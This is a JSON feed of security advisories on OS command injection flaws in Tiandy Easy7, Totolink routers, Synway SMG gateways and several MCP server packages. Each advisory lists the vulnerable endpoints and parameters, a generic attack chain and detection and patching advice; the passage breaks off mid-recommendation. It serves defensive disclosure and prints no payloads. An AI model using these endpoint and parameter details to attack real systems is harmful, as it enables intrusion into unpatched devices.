{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/command-injection/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[{"cvss":7.3,"id":"CVE-2026-7698"}],"_cs_exploited":false,"_cs_products":["Easy7 Integrated Management Platform (7.17.0)"],"_cs_severities":["critical"],"_cs_tags":["cve-2026-7698","command-injection","web-application"],"_cs_type":"advisory","_cs_vendors":["Tiandy"],"content_html":"\u003cp\u003eA critical vulnerability, CVE-2026-7698, has been identified in Tiandy Easy7 Integrated Management Platform version 7.17.0. This vulnerability resides within the \u003ccode\u003e/Easy7/rest/systemInfo/updateDbBackupInfo\u003c/code\u003e file, specifically related to the \u003ccode\u003eweek\u003c/code\u003e argument. Successful exploitation allows for arbitrary OS command injection. This vulnerability is remotely exploitable, meaning an attacker can trigger it over the network without needing local access. Publicly available exploit code exists, increasing the likelihood of exploitation. The vendor was notified but has not responded. Defenders should take immediate action to mitigate this risk.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker identifies a vulnerable Tiandy Easy7 Integrated Management Platform running version 7.17.0.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting the \u003ccode\u003e/Easy7/rest/systemInfo/updateDbBackupInfo\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe crafted request includes a payload within the \u003ccode\u003eweek\u003c/code\u003e argument designed to inject OS commands.\u003c/li\u003e\n\u003cli\u003eThe vulnerable application fails to properly sanitize or validate the \u003ccode\u003eweek\u003c/code\u003e argument.\u003c/li\u003e\n\u003cli\u003eThe application executes the injected OS command with the privileges of the web server.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary code execution on the server.\u003c/li\u003e\n\u003cli\u003eThe attacker can then perform further actions such as installing malware, exfiltrating data, or pivoting to other systems on the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-7698 allows an attacker to execute arbitrary commands on the affected system. This could lead to complete system compromise, data breaches, denial of service, or further lateral movement within the network. Given the publicly available exploit, organizations using Tiandy Easy7 Integrated Management Platform 7.17.0 are at immediate risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply available patches from Tiandy if they become available.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for requests to \u003ccode\u003e/Easy7/rest/systemInfo/updateDbBackupInfo\u003c/code\u003e containing suspicious characters or command injection attempts. Deploy the Sigma rule \u003ccode\u003eDetect Suspicious Requests to updateDbBackupInfo\u003c/code\u003e to your SIEM.\u003c/li\u003e\n\u003cli\u003eImplement input validation and sanitization on the \u003ccode\u003eweek\u003c/code\u003e argument within the \u003ccode\u003e/Easy7/rest/systemInfo/updateDbBackupInfo\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for unusual processes spawned by the web server, using the Sigma rule \u003ccode\u003eDetect OS Command Injection via Web Request\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eReview and restrict network access to the Tiandy Easy7 Integrated Management Platform to only authorized users and systems.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-03T14:16:27Z","date_published":"2026-05-03T14:16:27Z","id":"/briefs/2026-05-tiandy-command-injection/","summary":"CVE-2026-7698 allows for remote OS command injection in Tiandy Easy7 Integrated Management Platform 7.17.0 via manipulation of the 'week' argument in the /Easy7/rest/systemInfo/updateDbBackupInfo file.","title":"Tiandy Easy7 Integrated Management Platform OS Command Injection Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-05-tiandy-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.3,"id":"CVE-2026-7590"}],"_cs_exploited":false,"_cs_products":["p_69_branch_monkey_mcp"],"_cs_severities":["critical"],"_cs_tags":["command-injection","web-application","cve"],"_cs_type":"advisory","_cs_vendors":["eyal-gor"],"content_html":"\u003cp\u003eA critical OS command injection vulnerability, CVE-2026-7590, has been identified in the Preview Endpoint of eyal-gor\u0026rsquo;s p_69_branch_monkey_mcp. This vulnerability affects versions up to commit 69bc71874ce40050ef45fde5a435855f18af3373. A remote attacker can exploit this flaw by manipulating the \u003ccode\u003edev_script\u003c/code\u003e argument within the \u003ccode\u003ebranch_monkey_mcp/bridge_and_local_actions/routes/advanced.py\u003c/code\u003e file.  Successful exploitation allows for arbitrary command execution on the host operating system. The exploit is publicly available, increasing the risk of widespread exploitation. The vendor has been notified but has not yet responded. The lack of versioning makes it difficult to determine the exact scope of affected installations.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable instance of p_69_branch_monkey_mcp running a web server.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting the Preview Endpoint.\u003c/li\u003e\n\u003cli\u003eThe request includes a payload in the \u003ccode\u003edev_script\u003c/code\u003e argument designed to inject OS commands via the \u003ccode\u003ebranch_monkey_mcp/bridge_and_local_actions/routes/advanced.py\u003c/code\u003e file.\u003c/li\u003e\n\u003cli\u003eThe web server processes the request, passing the attacker-controlled \u003ccode\u003edev_script\u003c/code\u003e argument to a function that executes system commands without proper sanitization.\u003c/li\u003e\n\u003cli\u003eThe injected OS command is executed by the server, potentially with the privileges of the web server user. For example, an attacker could inject \u003ccode\u003els -la\u003c/code\u003e to list directory contents.\u003c/li\u003e\n\u003cli\u003eThe output of the injected command is returned to the attacker via the web server\u0026rsquo;s response, confirming successful command execution.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the initial command execution to escalate privileges, install persistent backdoors, or move laterally within the network, depending on the server\u0026rsquo;s configuration and accessible resources.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their final objective, such as data exfiltration, system compromise, or denial of service.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-7590 allows a remote attacker to execute arbitrary OS commands on the affected server. This could lead to complete system compromise, including data theft, malware installation, and denial of service. The lack of version information makes it difficult to ascertain the number of vulnerable installations, but given the publicly available exploit, widespread exploitation is possible. Organizations using p_69_branch_monkey_mcp are at high risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for suspicious requests targeting the Preview Endpoint and containing potentially malicious payloads in the \u003ccode\u003edev_script\u003c/code\u003e parameter as described in the attack chain. Use the \u0026ldquo;p_69_branch_monkey_mcp_command_injection\u0026rdquo; Sigma rule.\u003c/li\u003e\n\u003cli\u003eInspect process creation events for unexpected processes spawned by the web server, indicating potential command injection. Use the \u0026ldquo;p_69_branch_monkey_mcp_unexpected_process\u0026rdquo; Sigma rule.\u003c/li\u003e\n\u003cli\u003eImplement input validation and sanitization on the \u003ccode\u003edev_script\u003c/code\u003e parameter in the \u003ccode\u003ebranch_monkey_mcp/bridge_and_local_actions/routes/advanced.py\u003c/code\u003e file to prevent command injection.\u003c/li\u003e\n\u003cli\u003eAlthough specific vulnerable versions are unavailable, immediately investigate and patch any instances of \u003ccode\u003ep_69_branch_monkey_mcp\u003c/code\u003e due to the public exploit availability.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-02T12:00:00Z","date_published":"2026-05-02T12:00:00Z","id":"/briefs/2026-05-branch-monkey-mcp-command-injection/","summary":"A remote attacker can inject OS commands by manipulating the dev_script argument in the Preview Endpoint of eyal-gor's p_69_branch_monkey_mcp (up to commit 69bc71874ce40050ef45fde5a435855f18af3373), leading to arbitrary code execution on the server.","title":"OS Command Injection Vulnerability in p_69_branch_monkey_mcp Preview Endpoint (CVE-2026-7590)","url":"https://feed.craftedsignal.io/briefs/2026-05-branch-monkey-mcp-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.3,"id":"CVE-2026-7593"}],"_cs_exploited":false,"_cs_products":["command-executor-mcp-server"],"_cs_severities":["high"],"_cs_tags":["cve-2026-7593","command-injection","webserver"],"_cs_type":"advisory","_cs_vendors":["Sunwood-ai-labs"],"content_html":"\u003cp\u003eA critical security vulnerability, identified as CVE-2026-7593, affects Sunwood-ai-labs command-executor-mcp-server versions up to 0.1.0. This vulnerability resides within the \u003ccode\u003eexecute_command\u003c/code\u003e function of the \u003ccode\u003esrc/index.ts\u003c/code\u003e file, a component of the MCP Interface. Successful exploitation allows a remote attacker to inject and execute arbitrary operating system commands on the server. The vulnerability has been publicly disclosed, making it a high-risk issue for systems running the affected software. The vendor was notified through an issue report but has not yet responded, potentially increasing the window of opportunity for attackers. Defenders should prioritize patching or mitigating this vulnerability to prevent unauthorized command execution and potential system compromise.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a vulnerable instance of Sunwood-ai-labs command-executor-mcp-server running version 0.1.0 or earlier.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious request targeting the \u003ccode\u003eexecute_command\u003c/code\u003e function within the MCP Interface.\u003c/li\u003e\n\u003cli\u003eThe malicious request includes an OS command injection payload.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eexecute_command\u003c/code\u003e function in \u003ccode\u003esrc/index.ts\u003c/code\u003e fails to properly sanitize or neutralize the input, passing it directly to the operating system.\u003c/li\u003e\n\u003cli\u003eThe operating system executes the attacker-supplied command with the privileges of the server process.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary code execution on the server.\u003c/li\u003e\n\u003cli\u003eThe attacker can then use this access to perform further actions such as escalating privileges, installing malware, or exfiltrating sensitive data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-7593 allows an attacker to execute arbitrary commands on the affected server. This could lead to complete system compromise, including data theft, service disruption, or the deployment of malicious software. Given the ease of exploitation and the public availability of exploit code, organizations using the vulnerable Sunwood-ai-labs command-executor-mcp-server are at significant risk. While the exact number of affected installations is unknown, the potential impact is severe due to the possibility of full remote control over the compromised server.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply any available patches or updates from Sunwood-ai-labs to address CVE-2026-7593.\u003c/li\u003e\n\u003cli\u003eImplement input validation and sanitization measures within the \u003ccode\u003eexecute_command\u003c/code\u003e function to prevent OS command injection.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious Command Execution via MCP Server\u003c/code\u003e to identify potential exploitation attempts (see below).\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for suspicious requests targeting the MCP Interface, specifically those containing command injection payloads.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-01T21:16:17Z","date_published":"2026-05-01T21:16:17Z","id":"/briefs/2026-05-sunwood-command-injection/","summary":"CVE-2026-7593 is an OS command injection vulnerability in Sunwood-ai-labs command-executor-mcp-server up to version 0.1.0, allowing remote attackers to execute arbitrary commands via the execute_command function in src/index.ts.","title":"Sunwood-ai-labs command-executor-mcp-server OS Command Injection Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-05-sunwood-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.8,"id":"CVE-2026-7548"}],"_cs_exploited":false,"_cs_products":["NR1800X 9.1.0u.6279_B20210910"],"_cs_severities":["critical"],"_cs_tags":["command-injection","router","network"],"_cs_type":"advisory","_cs_vendors":["Totolink"],"content_html":"\u003cp\u003eA command injection vulnerability, identified as CVE-2026-7548, affects Totolink NR1800X router version 9.1.0u.6279_B20210910. The vulnerability resides within the \u003ccode\u003esub_41A68C\u003c/code\u003e function of the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e file. By manipulating the \u003ccode\u003esetUssd\u003c/code\u003e argument, a remote attacker can inject arbitrary commands into the system. Publicly available exploit code makes exploitation easier. This vulnerability poses a significant risk as it allows unauthenticated remote attackers to execute arbitrary commands on the affected device, potentially leading to full system compromise.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable Totolink NR1800X device running firmware version 9.1.0u.6279_B20210910.\u003c/li\u003e\n\u003cli\u003eThe attacker sends a crafted HTTP request to the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe HTTP request includes the \u003ccode\u003esetUssd\u003c/code\u003e argument with a malicious payload designed to inject a command.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003esub_41A68C\u003c/code\u003e function processes the \u003ccode\u003esetUssd\u003c/code\u003e argument without proper sanitization.\u003c/li\u003e\n\u003cli\u003eThe injected command is executed by the system with the privileges of the web server process.\u003c/li\u003e\n\u003cli\u003eThe attacker gains initial access and can execute arbitrary commands on the device.\u003c/li\u003e\n\u003cli\u003eThe attacker may then use the command execution to escalate privileges, install malware, or pivot to other devices on the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the affected Totolink NR1800X router. This could lead to complete compromise of the device, allowing the attacker to control network traffic, modify router settings, or use the router as a pivot point to attack other devices on the network. Given the wide usage of Totolink routers, a large number of devices could be vulnerable.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for requests to \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e containing suspicious characters or command injection attempts in the \u003ccode\u003esetUssd\u003c/code\u003e parameter, using the Sigma rule provided below.\u003c/li\u003e\n\u003cli\u003eImplement rate limiting on the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e endpoint to mitigate brute-force exploitation attempts.\u003c/li\u003e\n\u003cli\u003eApply available patches provided by Totolink to address the CVE-2026-7548 vulnerability.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to your SIEM and tune for your environment.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-01T03:16:01Z","date_published":"2026-05-01T03:16:01Z","id":"/briefs/2026-05-totolink-command-injection/","summary":"A command injection vulnerability exists in Totolink NR1800X version 9.1.0u.6279_B20210910, affecting the function sub_41A68C of the file /cgi-bin/cstecgi.cgi; by manipulating the argument setUssd, a remote attacker can inject commands, and an exploit is publicly available.","title":"Totolink NR1800X Command Injection Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-05-totolink-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":9.8,"id":"CVE-2025-71284"}],"_cs_exploited":false,"_cs_products":["SMG Gateway Management Software"],"_cs_severities":["critical"],"_cs_tags":["command-injection","rce","network"],"_cs_type":"advisory","_cs_vendors":["Synway"],"content_html":"\u003cp\u003eSynway SMG Gateway Management Software is susceptible to an OS command injection vulnerability (CVE-2025-71284) within the RADIUS configuration endpoint. An unauthenticated remote attacker can exploit this flaw by sending a specially crafted POST request to \u003ccode\u003e/en/9-2radius.php\u003c/code\u003e. The vulnerability lies in the improper sanitization of the \u003ccode\u003eradius_address\u003c/code\u003e POST parameter, which is directly incorporated into a \u003ccode\u003esed\u003c/code\u003e command. The Shadowserver Foundation observed the first exploitation evidence on 2025-07-11 (UTC). Successful exploitation allows the attacker to execute arbitrary shell commands on the affected system, potentially compromising the entire gateway. This vulnerability poses a significant risk to organizations using the Synway SMG Gateway, as it enables unauthenticated remote code execution.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn unauthenticated attacker identifies a Synway SMG Gateway Management Software instance exposed to the network.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious POST request targeting the \u003ccode\u003e/en/9-2radius.php\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe POST request includes parameters such as \u003ccode\u003eradius_address\u003c/code\u003e, \u003ccode\u003eradius_address2\u003c/code\u003e, \u003ccode\u003eshared_secret2\u003c/code\u003e, \u003ccode\u003esource_ip\u003c/code\u003e, \u003ccode\u003etimeout\u003c/code\u003e, or \u003ccode\u003eretry\u003c/code\u003e along with \u003ccode\u003esave=1\u003c/code\u003e and \u003ccode\u003eenable_radius=1\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eradius_address\u003c/code\u003e parameter contains an OS command injection payload.\u003c/li\u003e\n\u003cli\u003eThe application improperly sanitizes the \u003ccode\u003eradius_address\u003c/code\u003e parameter and incorporates it into a \u003ccode\u003esed\u003c/code\u003e command.\u003c/li\u003e\n\u003cli\u003eThe injected command is executed by the operating system, granting the attacker arbitrary code execution privileges.\u003c/li\u003e\n\u003cli\u003eThe attacker establishes a reverse shell to maintain persistence and expand their foothold.\u003c/li\u003e\n\u003cli\u003eThe attacker pivots within the network, gaining access to sensitive data or systems, and potentially establishing a long-term presence.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows an unauthenticated attacker to execute arbitrary commands on the Synway SMG Gateway. This could lead to complete system compromise, data theft, disruption of services, and further propagation of attacks within the network. Given the high CVSS score (9.8), this vulnerability represents a critical threat. The number of affected systems and organizations is currently unknown.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Synway SMG Gateway Radius Command Injection Attempt\u0026rdquo; to your SIEM to detect exploitation attempts based on suspicious POST requests to the vulnerable endpoint.\u003c/li\u003e\n\u003cli\u003eApply input validation and sanitization to the \u003ccode\u003eradius_address\u003c/code\u003e, \u003ccode\u003eradius_address2\u003c/code\u003e, \u003ccode\u003eshared_secret2\u003c/code\u003e, \u003ccode\u003esource_ip\u003c/code\u003e, \u003ccode\u003etimeout\u003c/code\u003e, and \u003ccode\u003eretry\u003c/code\u003e parameters in the RADIUS configuration endpoint.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for POST requests to \u003ccode\u003e/en/9-2radius.php\u003c/code\u003e containing suspicious characters or command sequences indicative of command injection attacks to activate the \u0026ldquo;Synway SMG Gateway Radius Command Injection Attempt\u0026rdquo; rule.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-30T17:16:25Z","date_published":"2026-04-30T17:16:25Z","id":"/briefs/2026-05-synway-smg-rce/","summary":"Synway SMG Gateway Management Management Software is vulnerable to unauthenticated OS command injection via crafted POST requests to the RADIUS configuration endpoint, leading to remote code execution.","title":"Synway SMG Gateway Management Software Unauthenticated OS Command Injection","url":"https://feed.craftedsignal.io/briefs/2026-05-synway-smg-rce/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.3,"id":"CVE-2026-7446"}],"_cs_exploited":false,"_cs_products":["mcp-server-semgrep 1.0.0"],"_cs_severities":["high"],"_cs_tags":["command-injection","vulnerability","mcp-server-semgrep"],"_cs_type":"advisory","_cs_vendors":["VetCoders"],"content_html":"\u003cp\u003eA critical OS command injection vulnerability has been identified in VetCoders mcp-server-semgrep version 1.0.0. The vulnerability resides within the MCP Interface component, specifically affecting the \u003ccode\u003eanalyze_results\u003c/code\u003e, \u003ccode\u003efilter_results\u003c/code\u003e, \u003ccode\u003eexport_results\u003c/code\u003e, \u003ccode\u003ecompare_results\u003c/code\u003e, \u003ccode\u003escan_directory\u003c/code\u003e, and \u003ccode\u003ecreate_rule\u003c/code\u003e functions in the \u003ccode\u003esrc/index.ts\u003c/code\u003e file. Successful exploitation allows for remote attackers to inject and execute arbitrary operating system commands on the affected system. The vulnerability is publicly known and actively exploitable. VetCoders has released version 1.0.1 to address this issue, with patch \u003ccode\u003e141335da044e53c3f5b315e0386e01238405b771\u003c/code\u003e containing the fix. Defenders should prioritize upgrading to version 1.0.1 to mitigate this risk.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable instance of VetCoders mcp-server-semgrep version 1.0.0.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious request targeting one of the vulnerable functions: \u003ccode\u003eanalyze_results\u003c/code\u003e, \u003ccode\u003efilter_results\u003c/code\u003e, \u003ccode\u003eexport_results\u003c/code\u003e, \u003ccode\u003ecompare_results\u003c/code\u003e, \u003ccode\u003escan_directory\u003c/code\u003e, or \u003ccode\u003ecreate_rule\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe malicious request includes a manipulated \u003ccode\u003eID\u003c/code\u003e argument designed to inject OS commands.\u003c/li\u003e\n\u003cli\u003eThe application fails to properly sanitize or validate the \u003ccode\u003eID\u003c/code\u003e argument.\u003c/li\u003e\n\u003cli\u003eThe application executes the injected OS command using a function such as \u003ccode\u003eexec\u003c/code\u003e, \u003ccode\u003esystem\u003c/code\u003e, or equivalent within the affected functions in \u003ccode\u003esrc/index.ts\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe injected command executes with the privileges of the mcp-server-semgrep process.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary code execution on the server.\u003c/li\u003e\n\u003cli\u003eThe attacker can then perform actions such as data exfiltration, lateral movement, or denial of service.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows a remote attacker to execute arbitrary operating system commands on the affected server. This could lead to complete system compromise, including data theft, modification, or destruction. Depending on the server\u0026rsquo;s role and the attacker\u0026rsquo;s objectives, this could result in significant financial loss, reputational damage, and disruption of services. There is no information about specific victim counts or targeted sectors.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade to VetCoders mcp-server-semgrep version 1.0.1 to remediate the vulnerability as identified in CVE-2026-7446.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious requests targeting the \u003ccode\u003e/src/index.ts\u003c/code\u003e file with unusual or potentially malicious input in the \u003ccode\u003eID\u003c/code\u003e argument, using the Sigma rules provided.\u003c/li\u003e\n\u003cli\u003eImplement input validation and sanitization for all user-supplied input, especially the \u003ccode\u003eID\u003c/code\u003e parameter, to prevent command injection attacks.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-30T00:17:01Z","date_published":"2026-04-30T00:17:01Z","id":"/briefs/2026-05-vetcoders-command-injection/","summary":"VetCoders mcp-server-semgrep version 1.0.0 is vulnerable to remote OS command injection due to manipulation of the ID argument in several functions of the MCP Interface component.","title":"VetCoders mcp-server-semgrep OS Command Injection Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-05-vetcoders-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.3,"id":"CVE-2026-7416"}],"_cs_exploited":false,"_cs_products":["xcode-mcp-server 1.0.0"],"_cs_severities":["critical"],"_cs_tags":["command-injection","vulnerability","xcode-mcp-server"],"_cs_type":"advisory","_cs_vendors":["PolarVista"],"content_html":"\u003cp\u003ePolarVista xcode-mcp-server version 1.0.0 is vulnerable to OS command injection (CVE-2026-7416). This vulnerability exists in the \u003ccode\u003ebuild_project/run_tests\u003c/code\u003e function within the \u003ccode\u003esrc/index.ts\u003c/code\u003e file of the MCP Interface component. An attacker can remotely inject operating system commands by manipulating the Request argument. The vulnerability has been publicly disclosed, increasing the risk of exploitation. The vendor has been notified but has not yet responded, leaving systems exposed. This poses a significant risk to organizations using this software, as successful exploitation allows complete system compromise.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable instance of PolarVista xcode-mcp-server 1.0.0.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious request targeting the \u003ccode\u003ebuild_project/run_tests\u003c/code\u003e function in \u003ccode\u003esrc/index.ts\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe malicious request includes an OS command injection payload within the Request argument.\u003c/li\u003e\n\u003cli\u003eThe application fails to properly sanitize or validate the Request argument.\u003c/li\u003e\n\u003cli\u003eThe application executes the injected OS command on the server.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary code execution on the server, potentially escalating privileges.\u003c/li\u003e\n\u003cli\u003eThe attacker installs malware, such as a reverse shell, to maintain persistent access.\u003c/li\u003e\n\u003cli\u003eThe attacker performs reconnaissance, lateral movement, and data exfiltration within the compromised network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows a remote attacker to execute arbitrary operating system commands on the affected server. This can lead to complete system compromise, data breaches, and denial of service. There are no reported victims or sectors targeted at this time, but given the ease of exploitation and public availability, the risk is high.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply available patches from PolarVista as soon as they are released to remediate CVE-2026-7416.\u003c/li\u003e\n\u003cli\u003eImplement input validation and sanitization for the Request argument in the \u003ccode\u003ebuild_project/run_tests\u003c/code\u003e function to prevent command injection.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious requests targeting the \u003ccode\u003ebuild_project/run_tests\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Suspicious xcode-mcp-server Requests\u0026rdquo; to identify potential exploitation attempts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-29T22:16:22Z","date_published":"2026-04-29T22:16:22Z","id":"/briefs/2026-04-polarvista-command-injection/","summary":"PolarVista xcode-mcp-server 1.0.0 is vulnerable to remote OS command injection via manipulation of the Request argument in the `build_project/run_tests` function, allowing attackers to execute arbitrary commands on the server.","title":"PolarVista xcode-mcp-server OS Command Injection Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-polarvista-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":9.8,"id":"CVE-2026-7241"}],"_cs_exploited":false,"_cs_products":["A8000RU"],"_cs_severities":["critical"],"_cs_tags":["cve-2026-7241","command-injection","router"],"_cs_type":"advisory","_cs_vendors":["Totolink"],"content_html":"\u003cp\u003eA critical vulnerability, CVE-2026-7241, has been identified in Totolink A8000RU router firmware version 7.1cu.643_b20200521. This vulnerability resides within the CGI Handler component, specifically in the \u003ccode\u003esetWiFiBasicCfg\u003c/code\u003e function of the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e file. Successful exploitation allows a remote attacker to inject and execute arbitrary operating system commands by manipulating the \u003ccode\u003ewifiOff\u003c/code\u003e argument. The vulnerability has been publicly disclosed, increasing the risk of exploitation. This poses a significant threat to users of the affected router model, potentially leading to complete system compromise.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a Totolink A8000RU router running firmware version 7.1cu.643_b20200521.\u003c/li\u003e\n\u003cli\u003eThe attacker sends a crafted HTTP request to the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe HTTP request targets the \u003ccode\u003esetWiFiBasicCfg\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe attacker injects malicious OS commands into the \u003ccode\u003ewifiOff\u003c/code\u003e argument of the HTTP request.\u003c/li\u003e\n\u003cli\u003eThe CGI handler processes the request without proper sanitization of the \u003ccode\u003ewifiOff\u003c/code\u003e argument.\u003c/li\u003e\n\u003cli\u003eThe injected OS commands are executed by the system with the privileges of the web server.\u003c/li\u003e\n\u003cli\u003eThe attacker gains remote shell access or performs other malicious actions, such as modifying router settings.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows a remote attacker to execute arbitrary operating system commands on the affected Totolink A8000RU router. This can lead to complete compromise of the device, potentially enabling the attacker to eavesdrop on network traffic, modify router configuration, or use the router as a node in a botnet. Given the widespread use of Totolink routers, a successful attack could impact numerous home and small business networks.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Totolink A8000RU Command Injection Attempt\u0026rdquo; to your SIEM to identify exploitation attempts targeting the vulnerable endpoint.\u003c/li\u003e\n\u003cli\u003eApply the Sigma rule \u0026ldquo;Detect Suspicious CGI Request Arguments\u0026rdquo; to identify unusual commands in cgi requests.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for requests to \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e with suspicious characters or commands in the \u003ccode\u003ewifiOff\u003c/code\u003e parameter, as this is the attack vector described in 